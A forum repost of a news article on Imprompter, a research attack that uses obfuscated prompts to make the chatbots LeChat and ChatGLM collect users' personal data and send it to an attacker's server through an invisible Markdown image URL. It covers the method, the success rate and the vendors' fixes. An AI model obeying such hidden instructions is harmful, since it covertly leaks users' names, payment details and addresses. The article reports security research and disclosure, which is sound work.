Imprompter: An Invisible Data Stealer in Chatbots

Man

Professional
Messages
3,077
Reaction score
614
Points
113
Researchers hacked LeChat and ChatGLM through hidden commands.

A team of researchers from the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore has developed a new method of attacking artificial intelligence language models (LLMs) that allows attackers to collect users' personal information, such as names, ID numbers, credit card details, and addresses. This method is called Imprompter and is an algorithm that covertly embeds malicious instructions into commands fed to the language model.

The study's lead author, Xiaohan Fu, a graduate student in computer science at UCSD, explained that the method works by embedding disguised instructions that at first glance look like a random set of characters. However, the language model understands them as commands to find and collect personal information. The attackers can use these hidden instructions to trick the model into collecting names, email addresses, payment details, and other sensitive information, and then send it to a server under the control of the hackers. The entire operation goes unnoticed by the user.

The researchers tested the attack on two popular language models: LeChat from the French company Mistral AI and the Chinese chatbot ChatGLM. Both tests showed a high effectiveness of the attack: in 80% of cases, the attackers managed to extract personal data from the test conversations. In response, Mistral AI said it had already fixed the vulnerability by disabling one of the chat features that was used to carry out the attack. In turn, ChatGLM confirmed that it attaches great importance to security issues, but refused to comment directly on this vulnerability.

The mechanism of the Imprompter attack is that the model receives a hidden command to search for personal data in the text of the conversation, and then formats it as a Markdown command for the image. Personal data is attached to a URL controlled by the attackers and sent to their server. The user does not notice anything, as the model returns an invisible pixel to the chat — a transparent image of 1x1 size.

According to UCSD professor Erlan Fernandez, the method is quite complex, since the disguised team must simultaneously find personal information, generate a working URL, apply Markdown syntax, and at the same time act covertly. Fernandez compared the attack to malicious software because of its ability to perform unwanted functions without being noticed by the user. He noted that usually such operations require writing a large amount of code, as in the case of traditional malware, but in this case, everything is hidden in a short and, at first glance, meaningless request.

Representatives of Mistral AI said that the company welcomes the help of researchers in improving the security of its products. In particular, after the vulnerability was discovered, Mistral AI promptly made the necessary changes, classifying the problem as a medium-severity vulnerability. The company blocked the ability to use Markdown syntax to load external images via URLs, thereby closing the loophole for attackers.

Fernandez believes that this is one of the first cases where a specific example of a malicious prompt attack has led to a patch for a vulnerability in an LLM-based product. However, he noted that in the long run, limiting the capabilities of language models could be "counterproductive" because it reduces their functionality.

Meanwhile, the developers of ChatGLM said that they have always paid great attention to the security of their models and continue to actively cooperate with the open community to increase their security. According to them, their model is secure, and protecting user privacy is always a priority.

The Imprompter study was also an important step towards improving the methods of attacking language models. Dan McInerney, lead threat researcher at Protect AI, emphasized that Imprompter is an algorithm for automated request generation that can be used for attacks to steal personal data, manipulate images, or perform other malicious actions. Although some aspects of the attack have something in common with previously known methods, the new algorithm allows them to be linked into a single whole, which makes the attack more effective.

With the growing popularity of language models and their use in everyday life, the risks of such attacks are also growing. McInerney noted that the launch of AI agents that accept arbitrary data from users should be considered a high-risk activity that requires serious testing before implementation. Companies should carefully evaluate how their models interact with data and consider potential abuse.

For regular users, this means thinking carefully about what information they transmit through chatbots and other artificial intelligence systems, as well as being attentive to prompts, especially if they were found online.

Source
 
Top